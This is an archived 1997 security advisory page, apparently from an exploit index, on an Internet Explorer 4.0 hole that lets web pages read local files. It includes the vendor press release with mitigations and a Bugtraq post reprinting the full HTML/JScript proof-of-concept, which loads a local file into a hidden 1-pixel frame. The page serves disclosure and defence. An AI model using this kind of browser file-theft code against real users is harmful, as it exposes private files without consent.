Spy on IE users' files

Summary

Description:	A hole in IE 4.0 allows web pages to read arbitrary files on a users hard drive.
Author:	Jabadoo software (www.jabadoo.de)
Compromise:	web servers can steal files from people who visit.
Vulnerable Systems:	Those running Micro$oft Internet Explorer 4.0
Date:	17 October 1997

Details

Date: Fri, 17 Oct 1997 11:35:37 -0500
From: Aleph One <aleph1@DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Security Hole in Explorer 4.0

http://www.jabadoo.de/press/ie4_us.html

   Security Hole in Explorer 4.0

   Freiburg - 10/16/97 - A dangerous security hole in Internet Explorer
   4.0 was detected by Ralf Hueskes of Jabadoo Communications when he
   conducted a series of security tests for [3]c't computer magazine.

   His tests revealed that it is possible to spy on the contents of any
   text and HTML files on somebody else's computer. Not only local files
   are in danger, but also data on your company's intranet - even if it
   is protected by a firewall.

   The security hole exists even if users have activated the highest
   security level in their browser. The problem affects both the German
   and the English version of the Internet Explorer.

   The code needed for infiltrating your files can be hidden in any
   normal Web page or in an e-mail message.

   Technical Details

   The spy pages make use of JScript. If a user accesses a page or
   receives an e-mail containing this code, infiltration begins ...

   The spy page contains a so-called IFRAME sized 1 by 1 pixel. When a
   user accesses the page or opens the e-mail message, a small Jscript
   program loads the HTML or text file to be spied on into this frame.
   The contents of the frame can then be read using Dynamic HTML and sent
   as a parameter hidden in a URL to any Web server in the Internet.

   [4]demo page

   Protective Measures

   According to Ralf Hueskes of Jabadoo Communications, the security hole
   exploits an error in the Internet Explorer 4.0 that can be fixed only
   by the manufacturer. Microsoft is aware of the problem and will make
   available a patch for download from [5]http://www.microsoft.com/ie/ on
   October 17th 1997.

   Experienced users can protect themselves by completely deactivating
   the execution of Active Scripting in the security settings (menu item:
   Tools/Options/Security, Settings/Custom (for expert users)/Active
   Scripting/Disable) and by using the Security Zones feature in Internet
   Explorer 4.0.

   More Information

   For more information (press only), please contact Ralf Hueskes of
   Jabadoo Communications (ralf.hueskes@jabadoo.de). Additional
   information can also be found in c't magazine, vol. 12/97 (to be
   published on 10/27/97).

   Miscellaneous

   Trademarks, program names, company names etc. mentioned on this Web
   page may be protected by trademark law and international agreements.
   Although all information has been verified, we cannot guarantee its
   correctness.
     _________________________________________________________________

References

   1. http://www.jabadoo.de/index.html
   2. http://www.jabadoo.de/index.html
   3. http://www.heise.de/ct/
   4. http://www.jabadoo.de/press/ie4demo.html
   5. http://www.microsoft.com/ie/
Date: Fri, 17 Oct 1997 18:05:56 -0500
From: Aleph One <aleph1@DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Jabadoo Security Hack

Well it seems Microsoft convinced the guys at Jabadoo to take down the
demostration page. For those that didnt get to see it here it (silly for
them to think that taking it down after it was up would make a differnce).

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01

---------- cut here ----------
<HTML>
<HEAD>
        <TITLE>IE4 Jabadoo Hack</TITLE>

<SCRIPT LANGUAGE="JavaScript">

function init()
{
        document.all("MyFrame1").src = 'file://c:/Windows/desktop/t1.txt';
        setTimeout ('getLinks()', 5000);
}

function getLinks()
{
        alert(document.all("MyFrame1").document.body.outerHTML);
}

</SCRIPT>

</HEAD>
<BODY onLoad="init()">

<A HREF="http://www.jabadoo.de/"><IMG SRC="/images/logo-small.gif" BORDER=0></A>

<FONT SIZE=2 FACE=Arial><P>This sample page shows the first part of the <B>jabadoo hack</B>: </P>

<P>With a delay of 5 seconds, the content of the file C:\WINDOWS\DESKTOP\T1.TXT is loaded by this sample page and displayed in a message box. </P>
<P>In a second step, this content could be hidden in an url and transfered to every server on the net ...</P>
<P>If you get an error message, the timeout of 5 seconds is propably too short or the file C:\WINDOWS\DESKTOP\T1.TXT does not exist on your computer ...</P>

<P><B><A HREF="ie4_us.html">English Press Release</A></B></P>

<P><B><A HREF="ie4.html">German Press Release</A></B></P>

<IFRAME STYLE="width=1px; height=1px;" NAME="MyFrame1" SRC="blank.html" >

</FONT>

</BODY>
</HTML>

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:

All OS's	Linux	Solaris/SunOS	Micro$oft
*BSD	Macintosh	AIX	IRIX
ULTRIX/Digital UNIX	HP/UX	SCO	Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: